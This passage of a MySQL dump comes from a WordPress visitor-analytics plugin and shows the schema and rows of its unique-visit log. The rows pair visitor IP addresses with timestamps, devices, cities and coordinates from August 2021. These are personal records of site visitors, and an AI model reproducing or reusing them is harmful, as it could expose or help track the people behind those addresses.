/*!50001 DROP VIEW IF EXISTS `wp_wsm_hourwisevisitors`*/;
SET @saved_cs_client     = @@character_set_client;
SET character_set_client = utf8;
/*!50001 CREATE VIEW `wp_wsm_hourwisevisitors` AS SELECT 
 1 AS `hour`,
 1 AS `visitors`*/;
SET character_set_client = @saved_cs_client;

--
-- Table structure for table `wp_wsm_logUniqueVisit`
--

DROP TABLE IF EXISTS `wp_wsm_logUniqueVisit`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wsm_logUniqueVisit` (
  `id` bigint(10) unsigned NOT NULL AUTO_INCREMENT,
  `siteId` int(10) unsigned NOT NULL,
  `visitorId` varchar(20) NOT NULL,
  `visitLastActionTime` datetime NOT NULL,
  `configId` varchar(20) NOT NULL,
  `ipAddress` varchar(16) NOT NULL,
  `userId` varchar(200) DEFAULT NULL,
  `firstActionVisitTime` datetime NOT NULL,
  `daysSinceFirstVisit` smallint(5) unsigned DEFAULT NULL,
  `returningVisitor` tinyint(1) DEFAULT NULL,
  `visitCount` int(11) unsigned NOT NULL,
  `visitEntryURLId` int(11) unsigned DEFAULT NULL,
  `visitExitURLId` int(11) unsigned DEFAULT '0',
  `visitTotalActions` int(11) unsigned DEFAULT NULL,
  `refererUrlId` int(11) DEFAULT NULL,
  `browserLang` varchar(20) DEFAULT NULL,
  `browserId` int(11) unsigned DEFAULT NULL,
  `deviceType` varchar(20) DEFAULT NULL,
  `oSystemId` int(11) unsigned DEFAULT NULL,
  `currentLocalTime` time DEFAULT NULL,
  `daysSinceLastVisit` smallint(5) unsigned DEFAULT NULL,
  `totalTimeVisit` int(11) unsigned NOT NULL,
  `resolutionId` int(11) unsigned DEFAULT NULL,
  `cookie` tinyint(1) DEFAULT NULL,
  `director` tinyint(1) DEFAULT NULL,
  `flash` tinyint(1) DEFAULT NULL,
  `gears` tinyint(1) DEFAULT NULL,
  `java` tinyint(1) DEFAULT NULL,
  `pdf` tinyint(1) DEFAULT NULL,
  `quicktime` tinyint(1) DEFAULT NULL,
  `realplayer` tinyint(1) DEFAULT NULL,
  `silverlight` tinyint(1) DEFAULT NULL,
  `windowsmedia` tinyint(1) DEFAULT NULL,
  `city` varchar(255) DEFAULT NULL,
  `countryId` int(3) unsigned NOT NULL,
  `latitude` decimal(9,6) DEFAULT NULL,
  `longitude` decimal(9,6) DEFAULT NULL,
  `regionId` tinyint(2) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `index_config_datetime` (`configId`,`visitLastActionTime`),
  KEY `index_datetime` (`visitLastActionTime`),
  KEY `index_idvisitor` (`visitorId`)
) ENGINE=InnoDB AUTO_INCREMENT=188 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wsm_logUniqueVisit`
--

LOCK TABLES `wp_wsm_logUniqueVisit` WRITE;
/*!40000 ALTER TABLE `wp_wsm_logUniqueVisit` DISABLE KEYS */;
INSERT INTO `wp_wsm_logUniqueVisit` VALUES (1,1,'118a62e5107dd764','2021-08-12 12:48:26','4ce6f62e4705134c','164.160.10.227','0','2021-08-12 12:47:39',0,0,1,1,2,1,0,'en-US',2,'Desktop',8,'12:47:37',0,48,20,1,0,0,0,0,1,0,0,0,0,'Tawalata',126,7.294400,-10.289200,0),(2,1,'f5cea1b341f5eafa','2021-08-12 13:22:08','015920a83a1dff04','41.191.107.138','0','2021-08-12 13:05:23',0,0,1,3,3,2,4,'en-us',4,'Mobile',11,'13:05:21',0,1006,25,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(3,1,'0dd2293c2a15c5fa','2021-08-12 13:16:45','c8662db60ec8ad1d','41.57.95.92','0','2021-08-12 13:16:45',0,0,1,1,1,1,0,'en-AU',2,'Mobile',10,'06:16:40',0,0,26,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(4,1,'6453d95a8a5387f4','2021-08-12 13:19:26','718f5a9ab64b85db','41.57.95.92','0','2021-08-12 13:16:48',0,0,1,1,5,2,0,'en-AU',2,'Mobile',10,'13:16:47',0,174,27,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(5,1,'04cdc12042c4f67f','2021-08-12 17:55:08','5389e290dc74c3b3','41.215.165.246','0','2021-08-12 13:21:30',0,0,1,6,6,2,0,'en-us',4,'Mobile',11,'13:21:16',0,16419,28,1,0,0,0,0,0,0,0,0,0,'',84,8.000000,-2.000000,0),(6,1,'b544bf0e99817d4e','2021-08-12 16:11:33','4ce6f62e4705134c','86.185.4.122','0','2021-08-12 13:41:40',0,0,1,8,21,6,4,'en-GB',2,'Desktop',8,'14:41:39',0,8994,19,1,0,0,0,0,1,0,0,0,0,'Chigwell',235,51.616700,0.083300,0),(7,1,'b6bdd91df3c41c68','2021-08-12 19:46:21','4ce6f62e4705134c','41.191.104.41','38','2021-08-12 14:26:59',0,0,1,9,8,5,0,'en-US',2,'Desktop',8,'14:26:57',0,19178,19,1,0,0,0,0,1,0,0,0,0,'',126,6.500000,-9.500000,0),(8,1,'ec74cc298e6417a3','2021-08-12 14:31:44','ded9f78b24550499','40.77.202.127','0','2021-08-12 14:31:44',0,0,1,6,6,1,0,'en-US',13,'Desktop',12,'07:31:42',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(9,1,'26f38ada2bbb1fbd','2021-08-12 15:08:09','4ce6f62e4705134c','41.86.18.172','0','2021-08-12 14:56:56',0,0,1,1,13,2,10,'en-US',2,'Desktop',8,'14:56:54',0,674,20,1,0,0,0,0,1,0,0,0,0,'',126,6.500000,-9.500000,0),(10,1,'e7cdd3ea5571d92c','2021-08-12 15:08:35','4ce6f62e4705134c','197.215.216.6','0','2021-08-12 15:07:34',0,0,1,11,14,2,0,'en-US',2,'Desktop',8,'15:07:31',0,62,20,1,0,0,0,0,1,0,0,0,0,'Monrovia',126,6.310600,-10.804700,0),(11,1,'c0a9314dc63a7009','2021-08-12 15:18:28','db3ba43adf65298e','63.247.155.42','0','2021-08-12 15:16:50',0,0,1,9,9,2,0,'en-US',1,'Desktop',13,'18:16:39',0,99,13,1,0,0,0,0,0,0,0,0,0,'Naples',236,26.266500,-81.714600,0),(12,1,'cf87b32218b0371c','2021-08-12 15:18:15','ded9f78b24550499','40.77.188.73','0','2021-08-12 15:18:15',0,0,1,15,15,1,0,'en-US',13,'Desktop',12,'08:18:14',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(13,1,'9c4f066647846cdc','2021-08-12 15:44:41','4ce6f62e4705134c','41.191.105.88','0','2021-08-12 15:44:41',0,0,1,16,16,1,17,'en-US',2,'Desktop',8,'15:53:23',0,164,20,1,0,0,0,0,1,0,0,0,0,'Robertsport',126,6.753300,-11.368600,0),(14,1,'dc7ad7679c596808','2021-08-12 17:00:15','dd182ebd52f9880c','193.188.156.131','0','2021-08-12 17:00:15',0,0,1,22,22,1,4,'en-US',2,'Desktop',8,'17:00:13',0,11326,19,1,0,0,0,0,1,0,0,0,0,'Stockholm',215,59.332600,18.064900,0),(15,1,'f3b6f729d49c8bd1','2021-08-12 18:15:00','0dc5b8988e8ee121','41.191.104.41','0','2021-08-12 18:15:00',0,0,1,6,6,1,0,'en-US',2,'Desktop',14,'11:14:59',0,896,12,1,0,0,0,0,1,0,0,0,0,'Monrovia',126,6.310600,-10.804700,0),(16,1,'e403afa26d31fe73','2021-08-12 18:53:16','4e410f535f35c411','41.191.104.41','38','2021-08-12 18:53:16',0,0,1,6,6,1,0,'en-US',1,'Desktop',14,'11:53:15',0,75,12,1,0,0,0,0,0,0,0,0,0,'Monrovia',126,6.310600,-10.804700,0),(17,1,'cbcf9845916ee09f','2021-08-12 19:18:34','ded9f78b24550499','40.77.190.90','0','2021-08-12 19:18:34',0,0,1,24,24,1,0,'en-US',13,'Desktop',12,'12:18:32',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(18,1,'e14e00eab3c31a86','2021-08-12 19:36:25','974d2d23a94cdc18','41.86.17.106','0','2021-08-12 19:36:25',0,0,1,3,3,1,4,'en-us',4,'Desktop',14,'19:36:24',0,47,12,1,0,0,0,1,1,0,0,0,0,'',126,6.500000,-9.500000,0),(19,1,'79573a4e844e785f','2021-08-12 19:41:18','b04321118fe34cfd','41.57.95.72','0','2021-08-12 19:41:18',0,0,1,3,3,1,0,'en-US',2,'Mobile',10,'19:41:04',0,5,29,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(20,1,'2d05fafe51eb7852','2021-08-12 20:19:17','ded9f78b24550499','40.77.202.99','0','2021-08-12 20:19:17',0,0,1,25,25,1,0,'en-US',13,'Desktop',12,'13:19:16',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(21,1,'16d39bfe8c2a779e','2021-08-12 20:29:43','ded9f78b24550499','40.77.202.50','0','2021-08-12 20:29:43',0,0,1,26,26,1,0,'en-US',13,'Desktop',12,'13:29:41',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(22,1,'f1199353911d7977','2021-08-12 20:45:07','ae4566657cc42040','91.73.12.125','0','2021-08-12 20:42:57',0,0,1,27,28,2,4,'en-US',2,'Mobile',10,'20:42:55',0,149,30,1,0,0,0,0,0,0,0,0,0,'Dubai',234,25.258200,55.304700,0),(23,1,'c2b6249eafe7613d','2021-08-12 20:55:30','015920a83a1dff04','97.70.146.113','0','2021-08-12 20:55:30',0,0,1,1,1,1,0,'en-us',4,'Mobile',11,'16:55:28',0,31,31,1,0,0,0,0,0,0,0,0,0,'Novi',236,42.473500,-83.522400,0),(24,1,'13051adba4f13ad8','2021-08-12 21:36:01','c8662db60ec8ad1d','41.57.95.93','0','2021-08-12 21:36:01',0,0,1,29,29,1,0,'en-GB',2,'Mobile',10,'14:35:58',0,0,26,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(25,1,'d68e79dcc3754725','2021-08-12 21:36:56','718f5a9ab64b85db','41.57.95.93','0','2021-08-12 21:36:56',0,0,1,29,29,1,0,'en-GB',2,'Mobile',10,'21:36:41',0,0,32,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(26,1,'94ea57bac25a930e','2021-08-12 23:06:37','ded9f78b24550499','40.77.190.17','0','2021-08-12 23:06:37',0,0,1,12,12,1,0,'en',13,'Desktop',12,'16:06:35',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(27,1,'2c3f163cf4e456c6','2021-08-12 23:26:09','ded9f78b24550499','40.77.189.232','0','2021-08-12 23:26:09',0,0,1,1,1,1,0,'en-US',13,'Desktop',12,'16:26:08',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(28,1,'97bc44393615646f','2021-08-13 01:07:21','ded9f78b24550499','40.77.188.211','0','2021-08-13 01:07:21',0,0,1,30,30,1,0,'en',13,'Desktop',12,'18:07:19',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(29,1,'16eac28561f18e05','2021-08-13 03:46:08','4ce6f62e4705134c','75.9.111.40','0','2021-08-13 03:28:48',0,0,1,1,13,3,31,'en-US',2,'Desktop',8,'22:28:46',0,1303,22,1,0,0,0,0,1,0,0,0,0,'Milwaukee',236,43.162400,-87.989800,0),(30,1,'927a8dddfa409b1c','2021-08-13 03:48:45','ded9f78b24550499','40.77.202.163','0','2021-08-13 03:48:45',0,0,1,32,32,1,0,'en-US',13,'Desktop',12,'20:48:43',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(31,1,'ac95b4cd9e9d394f','2021-08-13 07:11:02','4ce6f62e4705134c','96.2.140.162','0','2021-08-13 04:36:55',0,0,1,8,34,7,4,'en-US',2,'Desktop',8,'23:36:52',0,9442,33,1,0,0,0,0,1,0,0,0,0,'West Fargo',236,46.890700,-96.925800,0),(32,1,'de335d12e831eb9d','2021-08-13 05:35:51','00888ab739c2dca6','41.191.107.159','0','2021-08-13 05:35:51',0,0,1,35,35,1,4,'en-us',4,'Desktop',14,'05:35:50',0,0,13,1,0,0,0,1,1,0,0,0,0,'',126,6.500000,-9.500000,0),(33,1,'69568822807801b1','2021-08-13 06:08:34','ded9f78b24550499','40.77.139.71','0','2021-08-13 06:08:34',0,0,1,36,36,1,0,'en-US',13,'Desktop',12,'23:08:33',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(34,1,'b6bdd91df3c41c68','2021-08-13 06:51:16','4ce6f62e4705134c','41.191.104.41','38','2021-08-13 06:51:16',0,0,1,9,8,5,0,'en-US',2,'Desktop',8,'06:51:13',0,19178,19,1,0,0,0,0,1,0,0,0,0,'',126,6.500000,-9.500000,0),(35,1,'9e863d032d64e958','2021-08-13 07:03:33','aeaecdb0082d3146','197.89.156.44','0','2021-08-13 07:03:33',0,0,1,37,37,1,4,'en-gb',4,'Desktop',14,'09:03:32',0,0,12,1,0,0,0,0,1,0,0,0,0,'Cape Town',206,-33.916700,18.416700,0),(36,1,'66c16028e4fc14b1','2021-08-13 08:13:26','4ce6f62e4705134c','109.134.112.12','0','2021-08-13 08:08:24',0,0,1,39,9,3,4,'en-US',2,'Desktop',8,'10:08:20',0,355,20,1,0,0,0,0,1,0,0,0,0,'Brussels',22,50.846600,4.352800,0),(37,1,'5e7b6b1236e7f21e','2021-08-13 08:15:25','4571093d73ef6337','13.124.6.88','0','2021-08-13 08:15:25',0,0,1,5,5,1,0,'en-US',1,'Desktop',8,'08:15:24',0,0,22,1,0,0,0,0,0,0,0,0,0,'Incheon',119,37.453600,126.731700,0),(38,1,'b1baa8df363a32fc','2021-08-13 12:18:01','5f24e765daff4328','41.86.8.146','0','2021-08-13 08:21:14',0,0,1,40,5,29,4,'en-US',1,'Desktop',8,'08:21:12',0,14208,20,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(39,1,'62ce99a7c7a87750','2021-08-13 08:28:43','baff98a24b276dc6','173.252.87.111','0','2021-08-13 08:28:43',0,0,1,41,41,1,42,'en-US',4,'Mobile',11,'01:28:41',0,21,25,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(40,1,'faa64bc95737a19b','2021-08-13 09:22:37','4ce6f62e4705134c','132.147.124.181','0','2021-08-13 09:22:37',0,0,1,48,48,1,4,'en-US',2,'Desktop',8,'17:22:36',0,0,19,1,0,0,0,0,1,0,0,0,0,'Singapore',200,1.293100,103.855800,0),(41,1,'10f5e5a30344c4c5','2021-08-13 09:31:12','ded9f78b24550499','40.77.190.135','0','2021-08-13 09:31:12',0,0,1,36,36,1,0,'en-US',13,'Desktop',12,'02:31:11',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(42,1,'a832dde1b73dad9b','2021-08-13 10:42:23','4ce6f62e4705134c','41.191.107.150','0','2021-08-13 10:42:23',0,0,1,1,1,1,10,'en-US',2,'Desktop',8,'10:44:47',0,1327,20,1,0,0,0,0,1,0,0,0,0,'',126,6.500000,-9.500000,0),(43,1,'dc5e292012f9fb9d','2021-08-13 11:02:02','d8a4831bc733fafd','128.68.184.102','0','2021-08-13 11:02:02',0,0,1,40,40,1,49,'en-US',3,'Desktop',8,'14:02:14',0,0,22,1,0,0,0,0,1,0,0,0,0,'Lyubertsy',183,55.677800,37.883300,0),(44,1,'ffcb56100c11a382','2021-08-13 13:46:57','4ce6f62e4705134c','41.86.7.58','0','2021-08-13 11:05:19',0,0,1,50,50,2,10,'en-US',2,'Desktop',8,'11:05:10',0,9699,21,1,0,0,0,0,1,0,0,0,0,'Monrovia',126,6.310600,-10.804700,0),(45,1,'d2f6bbcc92e39cde','2021-08-13 11:14:29','39299172ab1dd88b','83.225.88.229','0','2021-08-13 11:14:29',0,0,1,25,25,1,0,'it-IT',2,'Desktop',14,'13:14:28',0,10781,22,1,0,0,0,0,1,0,0,0,0,'',110,43.147900,12.109700,0),(46,1,'f3f15963ae57a7f2','2021-08-13 11:54:52','4ce6f62e4705134c','41.191.104.40','0','2021-08-13 11:15:17',0,0,1,52,52,3,10,'en-US',2,'Desktop',8,'11:15:11',0,2376,20,1,0,0,0,0,1,0,0,0,0,'Monrovia',126,6.310600,-10.804700,0),(47,1,'25e9e59d695393ac','2021-08-13 11:39:27','d354e99fe704ad73','196.250.179.11','0','2021-08-13 11:31:46',0,0,1,53,53,3,4,'en-US',1,'Desktop',8,'11:31:44',0,462,20,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(48,1,'2bc670b86a9dd752','2021-08-13 11:36:51','4ce6f62e4705134c','41.86.7.38','0','2021-08-13 11:36:25',0,0,1,1,13,1,10,'en-US',2,'Desktop',8,'04:33:12',0,27,19,1,0,0,0,0,1,0,0,0,0,'Monrovia',126,6.310600,-10.804700,0),(49,1,'97bd1d8707be45f3','2021-08-13 12:14:03','4ce6f62e4705134c','197.215.23.158','0','2021-08-13 12:14:03',0,0,1,56,56,1,0,'en-US',2,'Desktop',8,'12:14:02',0,76,34,1,0,0,0,0,1,0,0,0,0,'',199,8.500000,-11.500000,0),(50,1,'af6cde098b9eb2ae','2021-08-13 12:19:06','97363c23b27785a4','169.252.4.21','0','2021-08-13 12:18:49',0,0,1,1,1,1,10,'en-US',2,'Desktop',8,'12:18:48',0,18,14,1,0,0,0,0,0,0,0,0,0,'Washington',236,38.893300,-77.014600,0),(51,1,'39eb0453e33558de','2021-08-13 12:42:16','ded9f78b24550499','40.77.139.14','0','2021-08-13 12:42:16',0,0,1,58,58,1,0,'en',13,'Desktop',12,'05:42:15',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(52,1,'443e17d9074b2205','2021-08-13 13:55:03','edecc252113cf1b4','41.191.107.157','0','2021-08-13 13:48:43',0,0,1,1,59,4,4,'en-US',2,'Mobile',3,'13:49:22',0,381,27,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(53,1,'6c0d1fcac162a302','2021-08-13 14:00:55','4ce6f62e4705134c','164.160.11.46','0','2021-08-13 13:59:38',0,0,1,61,61,3,17,'en-US',2,'Desktop',8,'14:02:28',0,78,19,1,0,0,0,0,1,0,0,0,0,'Tubmanburg',126,6.870800,-10.817200,0),(54,1,'b9a1cc9e53471194','2021-08-13 15:07:54','ded9f78b24550499','40.77.189.65','0','2021-08-13 15:07:54',0,0,1,8,8,1,0,'en-US',13,'Desktop',12,'08:07:53',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(55,1,'f73af3570c03833e','2021-08-13 17:41:28','39c42bb70ab72dfa','41.86.7.14','0','2021-08-13 17:41:28',0,0,1,34,34,1,4,'en-US',2,'Mobile',10,'17:41:25',0,31,35,1,0,0,0,0,0,0,0,0,0,'Monrovia',126,6.310600,-10.804700,0),(56,1,'5d98ffe7525f1254','2021-08-13 20:04:14','ded9f78b24550499','40.77.188.35','0','2021-08-13 20:04:14',0,0,1,50,50,1,0,'en',13,'Desktop',12,'13:04:12',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(57,1,'2e09f959ce909e70','2021-08-13 20:28:07','ded9f78b24550499','40.77.189.136','0','2021-08-13 20:28:07',0,0,1,52,52,1,0,'en-US',13,'Desktop',12,'13:28:06',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(58,1,'d7d01526a5770fb8','2021-08-13 23:18:01','9fb9b1676489e356','41.57.95.142','0','2021-08-13 23:07:18',0,0,1,1,1,8,4,'en-US',2,'Mobile',10,'23:07:16',0,644,36,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(59,1,'596252a0747c5d04','2021-08-14 00:45:19','ded9f78b24550499','40.77.189.121','0','2021-08-14 00:45:19',0,0,1,64,64,1,0,'en-US',13,'Desktop',12,'17:45:18',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(60,1,'6565e9301cacfc54','2021-08-14 01:47:02','ded9f78b24550499','40.77.190.233','0','2021-08-14 01:47:02',0,0,1,65,65,1,0,'en',13,'Desktop',12,'18:47:02',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(61,1,'52504b16aa88920a','2021-08-14 03:42:25','ded9f78b24550499','40.77.191.231','0','2021-08-14 03:42:25',0,0,1,66,66,1,0,'en',13,'Desktop',12,'20:42:21',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(62,1,'58dd87a255484962','2021-08-14 03:58:42','4ce6f62e4705134c','41.191.105.88','0','2021-08-14 03:58:32',0,0,1,67,68,1,0,'en-US',2,'Desktop',8,'03:58:30',0,109,19,1,0,0,0,0,1,0,0,0,0,'Robertsport',126,6.753300,-11.368600,0),(63,1,'5d742a932d9b935e','2021-08-14 08:45:22','ded9f78b24550499','40.77.189.73','0','2021-08-14 08:45:22',0,0,1,30,30,1,0,'en',13,'Desktop',12,'01:45:21',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(64,1,'851e3a7fbb3221f4','2021-08-14 09:24:29','63f05730ae762a41','41.191.107.151','0','2021-08-14 09:16:14',0,0,1,69,23,4,42,'en-US',2,'Mobile',10,'09:16:13',0,496,37,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(65,1,'30a0d1dbfe8ac4b8','2021-08-14 09:48:53','4ce6f62e4705134c','223.225.112.177','0','2021-08-14 09:48:53',0,0,1,70,70,1,31,'en-GB',2,'Desktop',8,'15:18:52',0,0,20,1,0,0,0,0,1,0,0,0,0,'New Delhi',103,28.600000,77.200000,0),(66,1,'54582b98ec3f0bad','2021-08-14 10:50:04','4fa706ca6bee6557','27.115.124.101','0','2021-08-14 10:50:04',0,0,1,5,5,1,71,'en',2,'Mobile',10,'18:50:03',0,0,2,1,0,0,0,0,0,0,0,0,0,'Shanghai',46,31.045600,121.399700,0),(67,1,'53247ff94a6baa25','2021-08-14 11:30:09','ded9f78b24550499','40.77.191.132','0','2021-08-14 11:30:09',0,0,1,72,72,1,0,'en',13,'Desktop',12,'04:30:06',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(68,1,'25ed96afa3180ed7','2021-08-14 12:38:33','5305ec78a98d17db','41.57.95.199','0','2021-08-14 12:38:33',0,0,1,73,73,1,4,'en-US',2,'Mobile',10,'12:38:30',0,30,38,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(69,1,'cbe63f5f35bb6b7c','2021-08-14 12:44:36','23971f8429f12b1a','41.57.95.239','0','2021-08-14 12:44:36',0,0,1,39,39,1,4,'en-US',2,'Mobile',10,'12:44:34',0,108,39,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(70,1,'a5f620902a18006e','2021-08-14 13:14:42','d354e99fe704ad73','84.189.90.222','0','2021-08-14 13:14:42',0,0,1,74,74,1,75,'de',1,'Desktop',8,'15:14:42',0,0,33,1,0,0,0,0,0,0,0,0,0,'Bonn',83,50.681300,7.154600,0),(71,1,'ec93d559f345ef4f','2021-08-14 13:22:58','9e82778438853ccc','41.191.105.93','0','2021-08-14 13:22:58',0,0,1,69,69,1,42,'en-US',2,'Mobile',10,'13:22:56',0,0,39,1,0,0,0,0,0,0,0,0,0,'Robertsport',126,6.753300,-11.368600,0),(72,1,'d2f6bbcc92e39cde','2021-08-14 13:56:46','39299172ab1dd88b','83.225.88.229','0','2021-08-14 13:56:46',0,0,1,25,25,1,0,'it-IT',2,'Desktop',14,'15:56:47',0,10781,22,1,0,0,0,0,1,0,0,0,0,'',110,43.147900,12.109700,0),(73,1,'4698baf817679530','2021-08-14 16:12:07','ded9f78b24550499','40.77.190.8','0','2021-08-14 16:12:07',0,0,1,39,39,1,0,'en-US',13,'Desktop',12,'09:12:06',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(74,1,'f8e69f346f692304','2021-08-14 16:17:32','9e82778438853ccc','41.191.104.119','0','2021-08-14 16:17:32',0,0,1,76,76,1,4,'en-US',2,'Mobile',10,'16:17:29',0,16,27,1,0,0,0,0,0,0,0,0,0,'Monrovia',126,6.310600,-10.804700,0),(75,1,'1eee6a1beaa9d6cd','2021-08-14 16:17:49','5f24e765daff4328','41.57.95.81','0','2021-08-14 16:17:37',0,0,1,5,9,2,0,'en-US',1,'Desktop',8,'09:17:26',0,1498,33,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(76,1,'f11bda5756096970','2021-08-14 17:51:00','edecc252113cf1b4','66.249.73.99','0','2021-08-14 17:51:00',0,0,1,77,77,1,0,'en-US',2,'Desktop',3,'10:50:10',0,0,40,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(77,1,'62ac29814bddba7e','2021-08-14 21:41:07','ded9f78b24550499','40.77.139.28','0','2021-08-14 21:41:07',0,0,1,78,78,1,0,'en-US',13,'Desktop',12,'14:41:06',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(78,1,'7f70394071d87bbf','2021-08-14 22:23:48','4ce6f62e4705134c','41.191.105.94','0','2021-08-14 22:23:48',0,0,1,70,70,1,4,'en-US',2,'Desktop',8,'22:23:46',0,0,33,1,0,0,0,0,1,0,0,0,0,'Robertsport',126,6.753300,-11.368600,0),(79,1,'2fd6daf60a9d540e','2021-08-14 22:48:22','5389e290dc74c3b3','41.191.105.94','0','2021-08-14 22:46:01',0,0,1,79,80,2,4,'en-us',4,'Mobile',11,'22:45:59',0,142,25,1,0,0,0,0,0,0,0,0,0,'Robertsport',126,6.753300,-11.368600,0),(80,1,'044bb3ca6f82588e','2021-08-14 22:47:45','9e82778438853ccc','172.58.157.231','0','2021-08-14 22:47:45',0,0,1,27,27,1,4,'en-US',2,'Mobile',10,'18:47:43',0,0,41,1,0,0,0,0,0,0,0,0,0,'San Juan',179,18.466300,-66.105700,0),(81,1,'e33b9b2d283372be','2021-08-14 23:12:53','ded9f78b24550499','40.77.190.199','0','2021-08-14 23:12:53',0,0,1,81,81,1,0,'en-US',13,'Desktop',12,'16:12:52',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(82,1,'6d6c8d89cd1d69c8','2021-08-14 23:21:54','63f05730ae762a41','41.191.107.214','0','2021-08-14 23:21:54',0,0,1,1,1,1,4,'en-US',2,'Mobile',10,'23:21:18',0,711,42,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(83,1,'319fc30070a83d31','2021-08-14 23:23:28','ded9f78b24550499','40.77.189.96','0','2021-08-14 23:23:28',0,0,1,34,34,1,0,'en-US',13,'Desktop',12,'16:23:26',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(84,1,'ff3e561ef4799980','2021-08-15 00:21:37','ded9f78b24550499','40.77.191.157','0','2021-08-15 00:21:37',0,0,1,82,82,1,0,'en',13,'Desktop',12,'17:21:35',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(85,1,'7f70394071d87bbf','2021-08-15 00:42:24','4ce6f62e4705134c','41.191.105.94','0','2021-08-15 00:42:24',0,0,1,70,70,1,4,'en-US',2,'Desktop',8,'00:42:22',0,0,33,1,0,0,0,0,1,0,0,0,0,'Robertsport',126,6.753300,-11.368600,0),(86,1,'d8621baf679cbdbd','2021-08-15 01:25:35','ded9f78b24550499','40.77.139.122','0','2021-08-15 01:25:35',0,0,1,30,30,1,0,'en',13,'Desktop',12,'18:25:31',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(87,1,'1e4c0350fe175a9a','2021-08-15 01:43:56','ded9f78b24550499','40.77.188.156','0','2021-08-15 01:43:56',0,0,1,30,30,1,0,'en',13,'Desktop',12,'18:43:54',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(88,1,'6b9be6cfa7c1c9ba','2021-08-15 02:43:46','ded9f78b24550499','40.77.190.167','0','2021-08-15 02:43:46',0,0,1,83,83,1,0,'en',13,'Desktop',12,'19:43:45',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(89,1,'25ed96afa3180ed7','2021-08-15 03:30:07','5305ec78a98d17db','41.57.95.199','0','2021-08-15 03:30:07',0,0,1,73,73,1,4,'en-US',2,'Mobile',10,'03:30:04',0,32,38,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(90,1,'9b8e691ceb66d653','2021-08-15 04:07:08','ded9f78b24550499','40.77.188.32','0','2021-08-15 04:07:08',0,0,1,30,30,1,0,'en',13,'Desktop',12,'21:07:06',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(91,1,'588835bb4aef61d0','2021-08-15 04:08:07','ded9f78b24550499','40.77.188.44','0','2021-08-15 04:08:07',0,0,1,84,84,1,0,'en',13,'Desktop',12,'21:08:05',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(92,1,'6ff908afad68c9b0','2021-08-15 04:17:14','edecc252113cf1b4','66.249.73.99','0','2021-08-15 